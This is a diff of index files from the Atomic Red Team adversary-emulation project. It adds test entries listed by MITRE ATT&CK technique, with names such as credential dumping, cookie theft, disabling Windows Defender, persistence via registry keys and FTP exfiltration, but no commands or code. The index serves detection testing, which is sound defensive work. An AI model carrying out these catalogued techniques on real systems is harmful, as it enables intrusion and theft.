privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
|
||||
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
|
||||
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
|
||||
@@ -391,6 +396,7 @@ privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution O
|
||||
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
|
||||
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
|
||||
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
|
||||
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
|
||||
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
|
||||
privilege-escalation,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
|
||||
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
|
||||
@@ -424,6 +430,8 @@ privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run K
|
||||
privilege-escalation,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
|
||||
privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
|
||||
privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
|
||||
privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
|
||||
privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (With Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
|
||||
privilege-escalation,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
|
||||
privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
|
||||
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
|
||||
@@ -533,6 +541,9 @@ persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via t
|
||||
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
|
||||
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
|
||||
persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
|
||||
persistence,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
|
||||
persistence,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
|
||||
persistence,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
|
||||
persistence,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
|
||||
persistence,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
|
||||
persistence,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
|
||||
@@ -572,6 +583,7 @@ persistence,T1546.012,Event Triggered Execution: Image File Execution Options In
|
||||
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
|
||||
persistence,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
|
||||
persistence,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
|
||||
persistence,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
|
||||
persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
|
||||
persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
|
||||
persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
|
||||
@@ -599,6 +611,8 @@ persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-
|
||||
persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
|
||||
persistence,T1098,Account Manipulation,9,Password Change on Directory Service Restore Mode (DSRM) Account,d5b886d9-d1c7-4b6e-a7b0-460041bf2823,command_prompt
|
||||
persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
|
||||
persistence,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
|
||||
persistence,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (With Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
|
||||
persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
|
||||
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
|
||||
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
|
||||
@@ -679,6 +693,8 @@ credential-access,T1110.001,Brute Force: Password Guessing,6,Password Brute User
|
||||
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
|
||||
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
|
||||
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
|
||||
credential-access,T1003,OS Credential Dumping,4,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list),6c7a4fd3-5b0b-4b30-a93e-39411b25d889,powershell
|
||||
credential-access,T1003,OS Credential Dumping,5,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config),42510244-5019-48fa-a0e5-66c3b76e6049,powershell
|
||||
credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
|
||||
credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
|
||||
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
|
||||
@@ -1020,3 +1036,4 @@ exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over
|
||||
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
|
||||
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
|
||||
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,6,MAZE FTP Upload,57799bc2-ad1e-4130-a793-fb0c385130ba,powershell
|
||||
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,7,Exfiltration Over Alternative Protocol - FTP - Rclone,b854eb97-bf9b-45ab-a1b5-b94e4880c56b,powershell
|
||||
|
||||
|
@@ -465,6 +465,7 @@
|
||||
- Atomic Test #34: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell [windows]
|
||||
- Atomic Test #35: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell [windows]
|
||||
- Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature [windows]
|
||||
- Atomic Test #37: WMIC Tamper with Windows Defender Evade Scanning Folder [windows]
|
||||
- T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -562,7 +563,8 @@
|
||||
- T1601.001 Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1146 Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
|
||||
- Atomic Test #1: HTML Smuggling Remote Payload [windows]
|
||||
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
|
||||
@@ -714,7 +716,10 @@
|
||||
- Atomic Test #1: Add a driver [windows]
|
||||
- T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
|
||||
- Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
|
||||
- Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
|
||||
- Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
|
||||
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
|
||||
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
|
||||
- [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
|
||||
@@ -805,6 +810,7 @@
|
||||
- [T1546.008 Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md)
|
||||
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
|
||||
- Atomic Test #2: Replace binary of sticky keys [windows]
|
||||
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
|
||||
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
|
||||
- Atomic Test #1: Process Injection via C# [windows]
|
||||
@@ -814,6 +820,7 @@
|
||||
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
|
||||
- Atomic Test #1: Persistence by modifying Windows Terminal profile [windows]
|
||||
- Atomic Test #2: Add macOS LoginItem using Applescript [macos]
|
||||
- [T1134.001 Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md)
|
||||
- Atomic Test #1: Named pipe client impersonation [windows]
|
||||
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
|
||||
@@ -872,6 +879,8 @@
|
||||
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546 Event Triggered Execution](../../T1546/T1546.md)
|
||||
- Atomic Test #1: Persistence with Custom AutodialDLL [windows]
|
||||
- Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
|
||||
- Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
|
||||
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
|
||||
- Atomic Test #1: Add command to .bash_profile [macos, linux]
|
||||
- Atomic Test #2: Add command to .bashrc [macos, linux]
|
||||
@@ -1142,7 +1151,10 @@
|
||||
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
|
||||
- Atomic Test #1: Add a driver [windows]
|
||||
- T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
|
||||
- Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
|
||||
- Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
|
||||
- Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
|
||||
- T1180 Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
|
||||
@@ -1253,6 +1265,7 @@
|
||||
- [T1546.008 Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md)
|
||||
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
|
||||
- Atomic Test #2: Replace binary of sticky keys [windows]
|
||||
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
|
||||
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
|
||||
@@ -1268,6 +1281,7 @@
|
||||
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
|
||||
- Atomic Test #1: Persistence by modifying Windows Terminal profile [windows]
|
||||
- Atomic Test #2: Add macOS LoginItem using Applescript [macos]
|
||||
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1098.001 Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md)
|
||||
- Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
|
||||
@@ -1332,6 +1346,8 @@
|
||||
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546 Event Triggered Execution](../../T1546/T1546.md)
|
||||
- Atomic Test #1: Persistence with Custom AutodialDLL [windows]
|
||||
- Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
|
||||
- Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
|
||||
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
|
||||
- Atomic Test #1: Add command to .bash_profile [macos, linux]
|
||||
- Atomic Test #2: Add command to .bashrc [macos, linux]
|
||||
@@ -1589,6 +1605,8 @@
|
||||
- Atomic Test #1: Gsecdump [windows]
|
||||
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
|
||||
- Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
|
||||
- Atomic Test #4: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) [windows]
|
||||
- Atomic Test #5: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) [windows]
|
||||
- T1171 LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
|
||||
- Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
|
||||
@@ -1623,11 +1641,13 @@
|
||||
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1040 Network Sniffing](../../T1040/T1040.md)
|
||||
- Atomic Test #1: Packet Capture Linux [linux]
|
||||
- Atomic Test #2: Packet Capture macOS [macos]
|
||||
- Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
|
||||
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
|
||||
- Atomic Test #4: Windows Internal Packet Capture [windows]
|
||||
- Atomic Test #5: Windows Internal pktmon capture [windows]
|
||||
- Atomic Test #6: Windows Internal pktmon set filter [windows]
|
||||
- Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- [T1552.002 Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md)
|
||||
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
|
||||
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
|
||||
@@ -1863,11 +1883,13 @@
|
||||
- Atomic Test #3: System Service Discovery - systemctl [linux]
|
||||
- [T1040 Network Sniffing](../../T1040/T1040.md)
|
||||
- Atomic Test #1: Packet Capture Linux [linux]
|
||||
- Atomic Test #2: Packet Capture macOS [macos]
|
||||
- Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
|
||||
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
|
||||
- Atomic Test #4: Windows Internal Packet Capture [windows]
|
||||
- Atomic Test #5: Windows Internal pktmon capture [windows]
|
||||
- Atomic Test #6: Windows Internal pktmon set filter [windows]
|
||||
- Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- [T1135 Network Share Discovery](../../T1135/T1135.md)
|
||||
- Atomic Test #1: Network Share Discovery [macos]
|
||||
- Atomic Test #2: Network Share Discovery - linux [linux]
|
||||
@@ -2378,4 +2400,5 @@
|
||||
- Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
|
||||
- Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
|
||||
- Atomic Test #6: MAZE FTP Upload [windows]
|
||||
- Atomic Test #7: Exfiltration Over Alternative Protocol - FTP - Rclone [windows]
|
||||
|
||||
|
||||
@@ -256,7 +256,8 @@
|
||||
- T1136.002 Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1547.015 Boot or Logon Autostart Execution: Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
|
||||
- Atomic Test #2: Add macOS LoginItem using Applescript [macos]
|
||||
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -332,7 +333,8 @@
|
||||
- Atomic Test #1: Make and modify binary from C source [macos, linux]
|
||||
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
|
||||
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
|
||||
- T1547.015 Boot or Logon Autostart Execution: Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
|
||||
- Atomic Test #2: Add macOS LoginItem using Applescript [macos]
|
||||
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546.014 Event Triggered Execution: Emond](../../T1546.014/T1546.014.md)
|
||||
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
|
||||
@@ -382,7 +384,9 @@
|
||||
- T1167 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1040 Network Sniffing](../../T1040/T1040.md)
|
||||
- Atomic Test #2: Packet Capture macOS [macos]
|
||||
- Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
|
||||
- Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1552 Unsecured Credentials](../../T1552/T1552.md)
|
||||
@@ -441,7 +445,9 @@
|
||||
- T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1007 System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1040 Network Sniffing](../../T1040/T1040.md)
|
||||
- Atomic Test #2: Packet Capture macOS [macos]
|
||||
- Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
|
||||
- Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- [T1135 Network Share Discovery](../../T1135/T1135.md)
|
||||
- Atomic Test #1: Network Share Discovery [macos]
|
||||
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
@@ -356,6 +356,7 @@
|
||||
- Atomic Test #34: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell [windows]
|
||||
- Atomic Test #35: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell [windows]
|
||||
- Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature [windows]
|
||||
- Atomic Test #37: WMIC Tamper with Windows Defender Evade Scanning Folder [windows]
|
||||
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -424,7 +425,8 @@
|
||||
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1223 Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
|
||||
- Atomic Test #1: HTML Smuggling Remote Payload [windows]
|
||||
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
|
||||
@@ -539,7 +541,10 @@
|
||||
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
|
||||
- Atomic Test #1: Add a driver [windows]
|
||||
- T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
|
||||
- Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
|
||||
- Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
|
||||
- Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
|
||||
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
|
||||
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
|
||||
@@ -604,6 +609,7 @@
|
||||
- [T1546.008 Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md)
|
||||
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
|
||||
- Atomic Test #2: Replace binary of sticky keys [windows]
|
||||
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
|
||||
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
|
||||
- Atomic Test #1: Process Injection via C# [windows]
|
||||
@@ -657,6 +663,8 @@
|
||||
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546 Event Triggered Execution](../../T1546/T1546.md)
|
||||
- Atomic Test #1: Persistence with Custom AutodialDLL [windows]
|
||||
- Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
|
||||
- Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
|
||||
- [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
|
||||
- Atomic Test #1: Injection SID-History with mimikatz [windows]
|
||||
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
|
||||
@@ -845,7 +853,10 @@
|
||||
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
|
||||
